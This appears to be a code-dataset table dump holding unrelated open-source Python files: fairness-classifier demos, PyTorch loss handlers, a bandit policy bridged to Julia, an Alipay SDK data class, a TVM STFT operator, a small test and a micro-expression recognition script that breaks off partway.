max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
fairness/algorithms/zafar/fair-classification-master/disparate_impact/synthetic_data_demo/fairness_acc_tradeoff.py | yashwarlord/fairness-comparison | 146 | 12797521 | <reponame>yashwarlord/fairness-comparison
import os,sys
import numpy as np
from generate_synthetic_data import *
sys.path.insert(0, '../../fair_classification/') # the code for fair classification is in this directory
import utils as ut
import loss_funcs as lf # loss funcs that can be optimized subject to various constraints
NUM_FOLDS = 10 # we will show 10-fold cross validation accuracy as a performance measure
def test_synthetic_data():
""" Generate the synthetic data """
X, y, x_control = generate_synthetic_data(plot_data=False)
ut.compute_p_rule(x_control["s1"], y) # compute the p-rule in the original data
""" Classify the data without any constraints """
apply_fairness_constraints = 0
apply_accuracy_constraint = 0
sep_constraint = 0
loss_function = lf._logistic_loss
X = ut.add_intercept(X) # add intercept to X before applying the linear classifier
test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i in range(0,NUM_FOLDS)])
print
print "== Unconstrained (original) classifier =="
ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, "s1")
""" Now classify such that we achieve perfect fairness """
apply_fairness_constraints = 1
cov_factor = 0
test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)])
print
print "== Constrained (fair) classifier =="
ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, "s1")
""" Now plot a tradeoff between the fairness and accuracy """
ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'])
def main():
test_synthetic_data()
if __name__ == '__main__':
main() |
S2.Surface_Normal/lib/helper.py | leoshine/Spherical_Regression | 133 | 12797551 | <filename>S2.Surface_Normal/lib/helper.py
# coding: utf8
"""
@Author : <NAME>
"""
import torch
import torch.nn as nn
from torch.autograd import Variable
import numpy as np
from easydict import EasyDict as edict
from collections import OrderedDict as odict
from itertools import product
def eval_cls(Preds, GTs):
acc = torch.mean((Preds==GTs).float())
return acc.item()
class Cross_Entropy_Loss_Handler:
def __init__(self):
self.cross_entropy_loss = nn.CrossEntropyLoss().cuda()
# interface function
def compute_loss(self, tgts, Pred, GT):
""" tgts: list of target names
GT : dict of ground truth for each target BxHxW
Pred: dict of prediction for each target BxHxWx4
"""
mask = GT['mask']
Loss = edict()
for tgt in tgts:
gt = GT[tgt][mask].view(-1) # as (BxK,)
pr = Pred[tgt][mask].view(gt.size(0),-1) # Pred[tgt][mask] (BxK, 4)
Loss[tgt] = self.cross_entropy_loss(pr, gt).double()
return Loss
class Neg_Dot_Loss_Handler:
def __init_(self):
pass
def compute_loss(self, tgts, Pred, GT):
Loss = edict()
for tgt in tgts:
""" Bug fixed on 22 Aug 2018
torch.dot can only be applied to 1-dim tensor
Don't know why there's no error. """
# Loss[tgt] = torch.mean( -torch.dot(GT[tgt],Pred[tgt]) ) # In fact here only does -GT[tgt]*Pred[tgt]
Loss[tgt] = torch.mean( -torch.sum(GT[tgt]*Pred[tgt], dim=1))
return Loss
class Cos_Proximity_Loss_Handler:
def __init__(self):
self.cos_sim = nn.CosineSimilarity(dim=1).cuda()
def compute_loss(self, tgts, Pred, GT):
""" tgts: list of target names. In this case has to be tgts=['norm']
GT : dict of ground truth for each target BxHxWx3
Pred: dict of prediction for each target BxHxWx3
"""
mask = GT['mask']
Loss = edict()
Errs = edict()
for tgt in tgts:
cos_sim = self.cos_sim(Pred[tgt][mask], GT[tgt][mask])
Loss[tgt] = torch.mean( 1 - cos_sim ) # use 1-cos(theta) to make loss as positive.
Errs[tgt] = torch.acos(cos_sim.clamp(-1,1))*180./np.pi # .clip(-1,1)
return Loss, Errs
class Smooth_L1_Loss_Handler:
def __init__(self):
self.smooth_l1_loss = nn.SmoothL1Loss().cuda()
def compute_loss(self, tgts, Pred, GT):
""" tgts: list of target names e.g. tgts=['a', 'e', 't']
GT : dict of ground truth for each target
Pred: dict of prediction for each target
"""
Loss = edict()
for tgt in tgts:
Loss[tgt] = self.smooth_l1_loss(Pred[tgt], GT[tgt]) # [warning] pred first, gt second
return Loss
|
SMPyBandits/Policies/Experimentals/UCBjulia.py | balbok0/SMPyBandits | 309 | 12797558 | <reponame>balbok0/SMPyBandits
# -*- coding: utf-8 -*-
""" The UCB policy for bounded bandits, with UCB indexes computed with Julia.
Reference: [Lai & Robbins, 1985].
.. warning::
Using a Julia function *from* Python will not speed up anything, as there is a lot of overhead in the "bridge" protocol used by pyjulia.
The idea of using naively a tiny Julia function to speed up computations is basically useless.
A naive benchmark showed that in this approach, :class:`UCBjulia` (used withing Python) is about 125 times slower (!) than :class:`UCB`.
.. warning:: This is only experimental, and purely useless. See https://github.com/SMPyBandits/SMPyBandits/issues/98
"""
from __future__ import division, print_function # Python 2 compatibility
__author__ = "<NAME>"
__version__ = "0.9"
# WARNING: this is a HUGE hack to fix a mystery bug on importing this policy
from sys import path
from os.path import dirname
path.insert(0, '/'.join(dirname(__file__).split('/')[:-1]))
try:
from .IndexPolicy import IndexPolicy
except ImportError:
from IndexPolicy import IndexPolicy
class UCBjulia(IndexPolicy):
""" The UCB policy for bounded bandits, with UCB indexes computed with Julia.
Reference: [Lai & Robbins, 1985].
.. warning:: This is only experimental, and purely useless. See https://github.com/SMPyBandits/SMPyBandits/issues/98
"""
def __init__(self, nbArms, lower=0., amplitude=1.):
""" Will fail directly if the bridge with julia is unavailable or buggy."""
super(UCBjulia, self).__init__(nbArms, lower=lower, amplitude=amplitude)
self.t = 0
# Importing the julia module and creating the bridge
try:
import julia
except ImportError as e:
print("Error: unable to load the 'julia' Python module. Install with 'pip install julia', or see https://github.com/JuliaPy/pyjulia/") # DEBUG
raise e
_j = julia.Julia()
try:
self._index_function = _j.evalfile("Policies/UCBjulia.jl")
except RuntimeError:
try:
self._index_function = _j.evalfile("UCBjulia.jl")
except RuntimeError:
raise ValueError("Error: Unable to load 'UCBjulia.jl' julia file.") # WARNING
try:
self._index_function([1], [1], 1, 1)
except (RuntimeError, ValueError):
raise ValueError("Error: the index function loaded from 'UCBjulia.jl' is bugged or unavailable.") # WARNING
def computeIndex(self, arm):
r""" Compute the current index, at time t and after :math:`N_k(t)` pulls of arm k:
.. math:: I_k(t) = \frac{X_k(t)}{N_k(t)} + \sqrt{\frac{2 \log(t)}{N_k(t)}}.
"""
# WARNING: the 'arm + 1' part comes from the difference between 0-based indexes
# for Python and the 1-based indexes in Julia. The rest works pretty well!
return self._index_function(self.rewards, self.pulls, self.t, arm + 1)
|
alipay/aop/api/domain/CollectReceiptOpenApiDTO.py | antopen/alipay-sdk-python-all | 213 | 12797562 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.MultiCurrencyMoneyOpenApi import MultiCurrencyMoneyOpenApi
from alipay.aop.api.domain.MultiCurrencyMoneyOpenApi import MultiCurrencyMoneyOpenApi
from alipay.aop.api.domain.MultiCurrencyMoneyOpenApi import MultiCurrencyMoneyOpenApi
from alipay.aop.api.domain.MultiCurrencyMoneyOpenApi import MultiCurrencyMoneyOpenApi
class CollectReceiptOpenApiDTO(object):
def __init__(self):
self._bsn_no = None
self._bsn_ref_no = None
self._business_scene = None
self._channel = None
self._channel_log_no = None
self._channel_memo = None
self._collect_amt = None
self._collect_date = None
self._collect_status = None
self._collected_amt = None
self._creator = None
self._freeze_amt = None
self._fund_log_id = None
self._gl_exchange_rate = None
self._gmt_create = None
self._gmt_modified = None
self._payee_account_name = None
self._payee_account_no = None
self._payee_inst_id = None
self._payee_ip_role_id = None
self._payer_account_name = None
self._payer_account_no = None
self._payer_bank_branch_name = None
self._payer_inst_id = None
self._payer_ip_role_id = None
self._receipt_no = None
self._ref_trans_no = None
self._ref_trans_no_type = None
self._source = None
self._status = None
self._tnt_inst_id = None
self._used_amt = None
self._writeoff_relative_id = None
@property
def bsn_no(self):
return self._bsn_no
@bsn_no.setter
def bsn_no(self, value):
self._bsn_no = value
@property
def bsn_ref_no(self):
return self._bsn_ref_no
@bsn_ref_no.setter
def bsn_ref_no(self, value):
self._bsn_ref_no = value
@property
def business_scene(self):
return self._business_scene
@business_scene.setter
def business_scene(self, value):
self._business_scene = value
@property
def channel(self):
return self._channel
@channel.setter
def channel(self, value):
self._channel = value
@property
def channel_log_no(self):
return self._channel_log_no
@channel_log_no.setter
def channel_log_no(self, value):
self._channel_log_no = value
@property
def channel_memo(self):
return self._channel_memo
@channel_memo.setter
def channel_memo(self, value):
self._channel_memo = value
@property
def collect_amt(self):
return self._collect_amt
@collect_amt.setter
def collect_amt(self, value):
if isinstance(value, MultiCurrencyMoneyOpenApi):
self._collect_amt = value
else:
self._collect_amt = MultiCurrencyMoneyOpenApi.from_alipay_dict(value)
@property
def collect_date(self):
return self._collect_date
@collect_date.setter
def collect_date(self, value):
self._collect_date = value
@property
def collect_status(self):
return self._collect_status
@collect_status.setter
def collect_status(self, value):
self._collect_status = value
@property
def collected_amt(self):
return self._collected_amt
@collected_amt.setter
def collected_amt(self, value):
if isinstance(value, MultiCurrencyMoneyOpenApi):
self._collected_amt = value
else:
self._collected_amt = MultiCurrencyMoneyOpenApi.from_alipay_dict(value)
@property
def creator(self):
return self._creator
@creator.setter
def creator(self, value):
self._creator = value
@property
def freeze_amt(self):
return self._freeze_amt
@freeze_amt.setter
def freeze_amt(self, value):
if isinstance(value, MultiCurrencyMoneyOpenApi):
self._freeze_amt = value
else:
self._freeze_amt = MultiCurrencyMoneyOpenApi.from_alipay_dict(value)
@property
def fund_log_id(self):
return self._fund_log_id
@fund_log_id.setter
def fund_log_id(self, value):
self._fund_log_id = value
@property
def gl_exchange_rate(self):
return self._gl_exchange_rate
@gl_exchange_rate.setter
def gl_exchange_rate(self, value):
self._gl_exchange_rate = value
@property
def gmt_create(self):
return self._gmt_create
@gmt_create.setter
def gmt_create(self, value):
self._gmt_create = value
@property
def gmt_modified(self):
return self._gmt_modified
@gmt_modified.setter
def gmt_modified(self, value):
self._gmt_modified = value
@property
def payee_account_name(self):
return self._payee_account_name
@payee_account_name.setter
def payee_account_name(self, value):
self._payee_account_name = value
@property
def payee_account_no(self):
return self._payee_account_no
@payee_account_no.setter
def payee_account_no(self, value):
self._payee_account_no = value
@property
def payee_inst_id(self):
return self._payee_inst_id
@payee_inst_id.setter
def payee_inst_id(self, value):
self._payee_inst_id = value
@property
def payee_ip_role_id(self):
return self._payee_ip_role_id
@payee_ip_role_id.setter
def payee_ip_role_id(self, value):
self._payee_ip_role_id = value
@property
def payer_account_name(self):
return self._payer_account_name
@payer_account_name.setter
def payer_account_name(self, value):
self._payer_account_name = value
@property
def payer_account_no(self):
return self._payer_account_no
@payer_account_no.setter
def payer_account_no(self, value):
self._payer_account_no = value
@property
def payer_bank_branch_name(self):
return self._payer_bank_branch_name
@payer_bank_branch_name.setter
def payer_bank_branch_name(self, value):
self._payer_bank_branch_name = value
@property
def payer_inst_id(self):
return self._payer_inst_id
@payer_inst_id.setter
def payer_inst_id(self, value):
self._payer_inst_id = value
@property
def payer_ip_role_id(self):
return self._payer_ip_role_id
@payer_ip_role_id.setter
def payer_ip_role_id(self, value):
self._payer_ip_role_id = value
@property
def receipt_no(self):
return self._receipt_no
@receipt_no.setter
def receipt_no(self, value):
self._receipt_no = value
@property
def ref_trans_no(self):
return self._ref_trans_no
@ref_trans_no.setter
def ref_trans_no(self, value):
self._ref_trans_no = value
@property
def ref_trans_no_type(self):
return self._ref_trans_no_type
@ref_trans_no_type.setter
def ref_trans_no_type(self, value):
self._ref_trans_no_type = value
@property
def source(self):
return self._source
@source.setter
def source(self, value):
self._source = value
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
@property
def tnt_inst_id(self):
return self._tnt_inst_id
@tnt_inst_id.setter
def tnt_inst_id(self, value):
self._tnt_inst_id = value
@property
def used_amt(self):
return self._used_amt
@used_amt.setter
def used_amt(self, value):
if isinstance(value, MultiCurrencyMoneyOpenApi):
self._used_amt = value
else:
self._used_amt = MultiCurrencyMoneyOpenApi.from_alipay_dict(value)
@property
def writeoff_relative_id(self):
return self._writeoff_relative_id
@writeoff_relative_id.setter
def writeoff_relative_id(self, value):
self._writeoff_relative_id = value
def to_alipay_dict(self):
params = dict()
if self.bsn_no:
if hasattr(self.bsn_no, 'to_alipay_dict'):
params['bsn_no'] = self.bsn_no.to_alipay_dict()
else:
params['bsn_no'] = self.bsn_no
if self.bsn_ref_no:
if hasattr(self.bsn_ref_no, 'to_alipay_dict'):
params['bsn_ref_no'] = self.bsn_ref_no.to_alipay_dict()
else:
params['bsn_ref_no'] = self.bsn_ref_no
if self.business_scene:
if hasattr(self.business_scene, 'to_alipay_dict'):
params['business_scene'] = self.business_scene.to_alipay_dict()
else:
params['business_scene'] = self.business_scene
if self.channel:
if hasattr(self.channel, 'to_alipay_dict'):
params['channel'] = self.channel.to_alipay_dict()
else:
params['channel'] = self.channel
if self.channel_log_no:
if hasattr(self.channel_log_no, 'to_alipay_dict'):
params['channel_log_no'] = self.channel_log_no.to_alipay_dict()
else:
params['channel_log_no'] = self.channel_log_no
if self.channel_memo:
if hasattr(self.channel_memo, 'to_alipay_dict'):
params['channel_memo'] = self.channel_memo.to_alipay_dict()
else:
params['channel_memo'] = self.channel_memo
if self.collect_amt:
if hasattr(self.collect_amt, 'to_alipay_dict'):
params['collect_amt'] = self.collect_amt.to_alipay_dict()
else:
params['collect_amt'] = self.collect_amt
if self.collect_date:
if hasattr(self.collect_date, 'to_alipay_dict'):
params['collect_date'] = self.collect_date.to_alipay_dict()
else:
params['collect_date'] = self.collect_date
if self.collect_status:
if hasattr(self.collect_status, 'to_alipay_dict'):
params['collect_status'] = self.collect_status.to_alipay_dict()
else:
params['collect_status'] = self.collect_status
if self.collected_amt:
if hasattr(self.collected_amt, 'to_alipay_dict'):
params['collected_amt'] = self.collected_amt.to_alipay_dict()
else:
params['collected_amt'] = self.collected_amt
if self.creator:
if hasattr(self.creator, 'to_alipay_dict'):
params['creator'] = self.creator.to_alipay_dict()
else:
params['creator'] = self.creator
if self.freeze_amt:
if hasattr(self.freeze_amt, 'to_alipay_dict'):
params['freeze_amt'] = self.freeze_amt.to_alipay_dict()
else:
params['freeze_amt'] = self.freeze_amt
if self.fund_log_id:
if hasattr(self.fund_log_id, 'to_alipay_dict'):
params['fund_log_id'] = self.fund_log_id.to_alipay_dict()
else:
params['fund_log_id'] = self.fund_log_id
if self.gl_exchange_rate:
if hasattr(self.gl_exchange_rate, 'to_alipay_dict'):
params['gl_exchange_rate'] = self.gl_exchange_rate.to_alipay_dict()
else:
params['gl_exchange_rate'] = self.gl_exchange_rate
if self.gmt_create:
if hasattr(self.gmt_create, 'to_alipay_dict'):
params['gmt_create'] = self.gmt_create.to_alipay_dict()
else:
params['gmt_create'] = self.gmt_create
if self.gmt_modified:
if hasattr(self.gmt_modified, 'to_alipay_dict'):
params['gmt_modified'] = self.gmt_modified.to_alipay_dict()
else:
params['gmt_modified'] = self.gmt_modified
if self.payee_account_name:
if hasattr(self.payee_account_name, 'to_alipay_dict'):
params['payee_account_name'] = self.payee_account_name.to_alipay_dict()
else:
params['payee_account_name'] = self.payee_account_name
if self.payee_account_no:
if hasattr(self.payee_account_no, 'to_alipay_dict'):
params['payee_account_no'] = self.payee_account_no.to_alipay_dict()
else:
params['payee_account_no'] = self.payee_account_no
if self.payee_inst_id:
if hasattr(self.payee_inst_id, 'to_alipay_dict'):
params['payee_inst_id'] = self.payee_inst_id.to_alipay_dict()
else:
params['payee_inst_id'] = self.payee_inst_id
if self.payee_ip_role_id:
if hasattr(self.payee_ip_role_id, 'to_alipay_dict'):
params['payee_ip_role_id'] = self.payee_ip_role_id.to_alipay_dict()
else:
params['payee_ip_role_id'] = self.payee_ip_role_id
if self.payer_account_name:
if hasattr(self.payer_account_name, 'to_alipay_dict'):
params['payer_account_name'] = self.payer_account_name.to_alipay_dict()
else:
params['payer_account_name'] = self.payer_account_name
if self.payer_account_no:
if hasattr(self.payer_account_no, 'to_alipay_dict'):
params['payer_account_no'] = self.payer_account_no.to_alipay_dict()
else:
params['payer_account_no'] = self.payer_account_no
if self.payer_bank_branch_name:
if hasattr(self.payer_bank_branch_name, 'to_alipay_dict'):
params['payer_bank_branch_name'] = self.payer_bank_branch_name.to_alipay_dict()
else:
params['payer_bank_branch_name'] = self.payer_bank_branch_name
if self.payer_inst_id:
if hasattr(self.payer_inst_id, 'to_alipay_dict'):
params['payer_inst_id'] = self.payer_inst_id.to_alipay_dict()
else:
params['payer_inst_id'] = self.payer_inst_id
if self.payer_ip_role_id:
if hasattr(self.payer_ip_role_id, 'to_alipay_dict'):
params['payer_ip_role_id'] = self.payer_ip_role_id.to_alipay_dict()
else:
params['payer_ip_role_id'] = self.payer_ip_role_id
if self.receipt_no:
if hasattr(self.receipt_no, 'to_alipay_dict'):
params['receipt_no'] = self.receipt_no.to_alipay_dict()
else:
params['receipt_no'] = self.receipt_no
if self.ref_trans_no:
if hasattr(self.ref_trans_no, 'to_alipay_dict'):
params['ref_trans_no'] = self.ref_trans_no.to_alipay_dict()
else:
params['ref_trans_no'] = self.ref_trans_no
if self.ref_trans_no_type:
if hasattr(self.ref_trans_no_type, 'to_alipay_dict'):
params['ref_trans_no_type'] = self.ref_trans_no_type.to_alipay_dict()
else:
params['ref_trans_no_type'] = self.ref_trans_no_type
if self.source:
if hasattr(self.source, 'to_alipay_dict'):
params['source'] = self.source.to_alipay_dict()
else:
params['source'] = self.source
if self.status:
if hasattr(self.status, 'to_alipay_dict'):
params['status'] = self.status.to_alipay_dict()
else:
params['status'] = self.status
if self.tnt_inst_id:
if hasattr(self.tnt_inst_id, 'to_alipay_dict'):
params['tnt_inst_id'] = self.tnt_inst_id.to_alipay_dict()
else:
params['tnt_inst_id'] = self.tnt_inst_id
if self.used_amt:
if hasattr(self.used_amt, 'to_alipay_dict'):
params['used_amt'] = self.used_amt.to_alipay_dict()
else:
params['used_amt'] = self.used_amt
if self.writeoff_relative_id:
if hasattr(self.writeoff_relative_id, 'to_alipay_dict'):
params['writeoff_relative_id'] = self.writeoff_relative_id.to_alipay_dict()
else:
params['writeoff_relative_id'] = self.writeoff_relative_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = CollectReceiptOpenApiDTO()
if 'bsn_no' in d:
o.bsn_no = d['bsn_no']
if 'bsn_ref_no' in d:
o.bsn_ref_no = d['bsn_ref_no']
if 'business_scene' in d:
o.business_scene = d['business_scene']
if 'channel' in d:
o.channel = d['channel']
if 'channel_log_no' in d:
o.channel_log_no = d['channel_log_no']
if 'channel_memo' in d:
o.channel_memo = d['channel_memo']
if 'collect_amt' in d:
o.collect_amt = d['collect_amt']
if 'collect_date' in d:
o.collect_date = d['collect_date']
if 'collect_status' in d:
o.collect_status = d['collect_status']
if 'collected_amt' in d:
o.collected_amt = d['collected_amt']
if 'creator' in d:
o.creator = d['creator']
if 'freeze_amt' in d:
o.freeze_amt = d['freeze_amt']
if 'fund_log_id' in d:
o.fund_log_id = d['fund_log_id']
if 'gl_exchange_rate' in d:
o.gl_exchange_rate = d['gl_exchange_rate']
if 'gmt_create' in d:
o.gmt_create = d['gmt_create']
if 'gmt_modified' in d:
o.gmt_modified = d['gmt_modified']
if 'payee_account_name' in d:
o.payee_account_name = d['payee_account_name']
if 'payee_account_no' in d:
o.payee_account_no = d['payee_account_no']
if 'payee_inst_id' in d:
o.payee_inst_id = d['payee_inst_id']
if 'payee_ip_role_id' in d:
o.payee_ip_role_id = d['payee_ip_role_id']
if 'payer_account_name' in d:
o.payer_account_name = d['payer_account_name']
if 'payer_account_no' in d:
o.payer_account_no = d['payer_account_no']
if 'payer_bank_branch_name' in d:
o.payer_bank_branch_name = d['payer_bank_branch_name']
if 'payer_inst_id' in d:
o.payer_inst_id = d['payer_inst_id']
if 'payer_ip_role_id' in d:
o.payer_ip_role_id = d['payer_ip_role_id']
if 'receipt_no' in d:
o.receipt_no = d['receipt_no']
if 'ref_trans_no' in d:
o.ref_trans_no = d['ref_trans_no']
if 'ref_trans_no_type' in d:
o.ref_trans_no_type = d['ref_trans_no_type']
if 'source' in d:
o.source = d['source']
if 'status' in d:
o.status = d['status']
if 'tnt_inst_id' in d:
o.tnt_inst_id = d['tnt_inst_id']
if 'used_amt' in d:
o.used_amt = d['used_amt']
if 'writeoff_relative_id' in d:
o.writeoff_relative_id = d['writeoff_relative_id']
return o
|
python/tvm/topi/cuda/stft.py | shengxinhu/tvm | 4,640 | 12797585 | <gh_stars>1000+
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, too-many-arguments, too-many-nested-blocks, unused-argument
"""STFT operator"""
from math import pi
import tvm
from tvm import te, tir
from ..utils import ceil_div
def _get_max_threads(batch_row):
max_threads = tvm.target.Target.current(allow_none=False).max_num_threads
return tir.min(batch_row, max_threads)
def stft(
data,
n_fft,
hop_length,
win_length,
window,
normalized,
onesided,
output_shape,
):
"""
The STFT computes the Fourier transform of short overlapping windows of the input.
This gives frequency components of the signal as they change over time.
Parameters
----------
data : relay.Expr
Either a 1-D tensor or a 2-D batch tensor.
n_fft : int
The size of Fourier transform
hop_length : int
The distance between neighboring sliding window frames
win_length : int
The size of window frame and STFT filter
window : relay.Expr
A 1-D tensor window frame
normalized : bool
Whether to return the normalized STFT results
onesided : bool
Whether to return onesided result or fill with conjugate symmetry
Returns
-------
output : relay.Expr
Tensor containing the STFT result
Examples
--------
.. code-block:: python
data = [1, 2, 3, 4, 5, 6]
window = [4, 3, 2]
[n_fft, hop_length, win_length, normalized, onesided] = [3, 3, 3, False, True]
relay.stft(data, n_fft, hop_length, win_length, window, normalized, onesided)
-> [[[15.0000, 0.0000], [34.0000, 0.0000]], [[ 4.5000, 0.8660], [ 1.0000, -1.7321]]]
"""
def gen_ir(
data_ptr,
n_fft,
hop_length,
win_length,
window_ptr,
normalized,
onesided,
output_ptr,
):
ib = tir.ir_builder.create()
data = ib.buffer_ptr(data_ptr)
window = ib.buffer_ptr(window_ptr)
output = ib.buffer_ptr(output_ptr)
max_threads = _get_max_threads(output_ptr.shape[0] * output_ptr.shape[1])
output_size = output_ptr.shape[0] * output_ptr.shape[1] * output_ptr.shape[2]
with ib.new_scope():
nthread_tx = max_threads
nthread_bx = ceil_div(output_size, max_threads)
tx = te.thread_axis("threadIdx.x")
bx = te.thread_axis("blockIdx.x")
ib.scope_attr(tx, "thread_extent", nthread_tx)
ib.scope_attr(bx, "thread_extent", nthread_bx)
tid = bx * max_threads + tx
with ib.if_scope(tid < output_size):
matrix_size = output_ptr.shape[1] * output_ptr.shape[2]
batch = tir.floordiv(tid, matrix_size)
row = tir.floordiv(tir.indexmod(tid, matrix_size), output_ptr.shape[2])
col = tir.indexmod(tir.indexmod(tid, matrix_size), output_ptr.shape[2])
output[batch, row, col, 0] = tir.Cast(data_ptr.dtype, 0)
output[batch, row, col, 1] = tir.Cast(data_ptr.dtype, 0)
with ib.for_range(0, win_length) as wlen:
output[batch, row, col, 0] += (
window[wlen]
* data[batch, col * hop_length + wlen]
* tir.cos(2 * pi * row * wlen / win_length)
)
output[batch, row, col, 1] -= (
window[wlen]
* data[batch, col * hop_length + wlen]
* tir.sin(2 * pi * row * wlen / win_length)
)
with ib.if_scope(normalized):
output[batch, row, col, 0] /= tir.sqrt(tir.const(n_fft, "float32"))
output[batch, row, col, 1] /= tir.sqrt(tir.const(n_fft, "float32"))
return ib.get()
output_buf = tir.decl_buffer(output_shape, data.dtype, "output_buf")
return te.extern(
output_shape,
[data, window],
lambda ins, outs: gen_ir(
ins[0], n_fft, hop_length, win_length, ins[1], normalized, onesided, outs[0]
),
dtype=[data.dtype],
out_buffers=[output_buf],
name="stft_cuda",
tag="stft_cuda",
)
|
title_cleaner_test.py | susannahsoon/oldperth | 302 | 12797588 | from nose.tools import *
import title_cleaner
TRUTH = [
(True, 'Manhattan: 1st Ave. - 34th St. E.'),
(True, 'Queens: Hoyt Avenue - 24th Street'),
(False, "Queens: Flushing Meadow Park - New York World's Fair of 1939-40 - [Industrial exhibits.]"),
(False, 'Fifth Avenue - 90th Street, southeast corner'),
(False, 'Recreation and hobbies - Miscellaneous - Children.'),
(True, 'Manhattan: 59th Street - 6th Avenue'),
(True, 'Queens: Queens Boulevard - Junction Boulevard'),
(True, 'Manhattan: 50th Street (West) - 5th Avenue'),
(True, 'Manhattan: 5th Avenue - 78th Street'),
(True, 'Manhattan: 5th Avenue - 33rd Street'),
(True, 'Queens: Queens Boulevard - 62nd Avenue'),
(False, 'Manhattan: Battery Park.'),
(False, 'Manhattan: Central Park - The Sailboat Pool'),
(True, 'Queens: Colonial Avenue - 62nd Drive'),
(True, 'Queens: Woodhaven Blvd - Fleet Street'),
(True, 'Richmond: New Dorp Lane - Cedar Grove Avenue')
]
def test_clean_title():
for correct, title in TRUTH:
assert correct == title_cleaner.is_pure_location(title), '%s %s' % (correct, title)
|
ml-agents/mlagents/envs/__init__.py | icaro56/ml-agents | 134 | 12797620 | from .environment import *
from .brain import *
from .exception import *
|
archive/original_main.py | FDKevin0/Micro-Expression-with-Deep-Learning | 249 | 12797650 | <filename>archive/original_main.py
import numpy as np
import sys
import math
import operator
import csv
import glob,os
import xlrd
import cv2
import pandas as pd
from sklearn.svm import SVC
from collections import Counter
from sklearn.metrics import confusion_matrix
import scipy.io as sio
from keras.models import Sequential
from keras.layers import LSTM, Dense, TimeDistributed
from keras.utils import np_utils
from keras import metrics
from keras import backend as K
from labelling import collectinglabel
from reordering import readinput
from evaluationmatrix import fpr
workplace='/media/ice/OS/Datasets/CASME2_TIM/'
dB="CASME2_TIM"
rootpath = '/media/ice/OS/Datasets/CASME2_TIM/CASME2_TIM/'
if dB == "CASME2_raw":
inputDir='/media/ice/OS/Datasets/CASME2-RAW/'
resizedFlag=1;
elif dB== "CASME2_large":
inputDir='/media/ice/OS/Datasets/CASME 2/'
wb=xlrd.open_workbook('/media/ice/OS/Datasets/CASME 2/CASME2_label_Ver_2.xls');
ws=wb.sheet_by_index(0)
colm=ws.col_slice(colx=0,start_rowx=1,end_rowx=None)
iD=[str(x.value) for x in colm]
colm=ws.col_slice(colx=1,start_rowx=1,end_rowx=None)
vidName=[str(x.value) for x in colm]
colm=ws.col_slice(colx=6,start_rowx=1,end_rowx=None)
expression=[str(x.value) for x in colm]
table=np.transpose(np.array([np.array(iD),np.array(vidName),np.array(expression)],dtype=str))
subjects=26
samples=246
n_exp=5
resizedFlag=1;
r=68; w=56
VidPerSubject = [9,13,7,5,19,5,9,3,13,13,10,12,8,4,3,4,34,3,15,11,2,2,12,7,7,16]
IgnoredSamples=['sub09/EP13_02','sub09/EP02_02f','sub10/EP13_01','sub17/EP15_01',
'sub17/EP15_03','sub19/EP19_04','sub24/EP10_03','sub24/EP07_01',
'sub24/EP07_04f','sub24/EP02_07','sub26/EP15_01']
listOfIgnoredSamples=[]
for s in range(len(IgnoredSamples)):
if s==0:
listOfIgnoredSamples=[inputDir+IgnoredSamples[s]]
else:
listOfIgnoredSamples.append(inputDir+IgnoredSamples[s])
elif dB== "CASME2_TIM":
inputDir='/media/ice/OS/Datasets/CASME2_TIM/CASME2_TIM/' #replace with croppoed for testing
wb=xlrd.open_workbook('/media/ice/OS/Datasets/CASME2_label_Ver_2.xls');
ws=wb.sheet_by_index(0)
colm=ws.col_slice(colx=0,start_rowx=1,end_rowx=None)
iD=[str(x.value) for x in colm]
colm=ws.col_slice(colx=1,start_rowx=1,end_rowx=None)
vidName=[str(x.value) for x in colm]
colm=ws.col_slice(colx=6,start_rowx=1,end_rowx=None)
expression=[str(x.value) for x in colm]
table=np.transpose(np.array([np.array(iD),np.array(vidName),np.array(expression)],dtype=str))
# print(type(table))
r=50; w=50
resizedFlag=1;
subjects=26
samples=246
n_exp=5
VidPerSubject = [9,13,7,5,19,5,9,3,13,13,10,12,8,4,3,4,34,3,15,11,2,2,12,7,7,16]
IgnoredSamples=['sub09/EP13_02/','sub09/EP02_02f/','sub10/EP13_01/','sub17/EP15_01/',
'sub17/EP15_03/','sub19/EP19_04/','sub24/EP10_03/','sub24/EP07_01/',
'sub24/EP07_04f/','sub24/EP02_07/','sub26/EP15_01/']
listOfIgnoredSamples=[]
for s in range(len(IgnoredSamples)):
if s==0:
listOfIgnoredSamples=[inputDir+IgnoredSamples[s]]
else:
listOfIgnoredSamples.append(inputDir+IgnoredSamples[s])
elif dB == "SMIC":
inputDir="/srv/oyh/DataBase/SMIC/HS_naming_modified/"
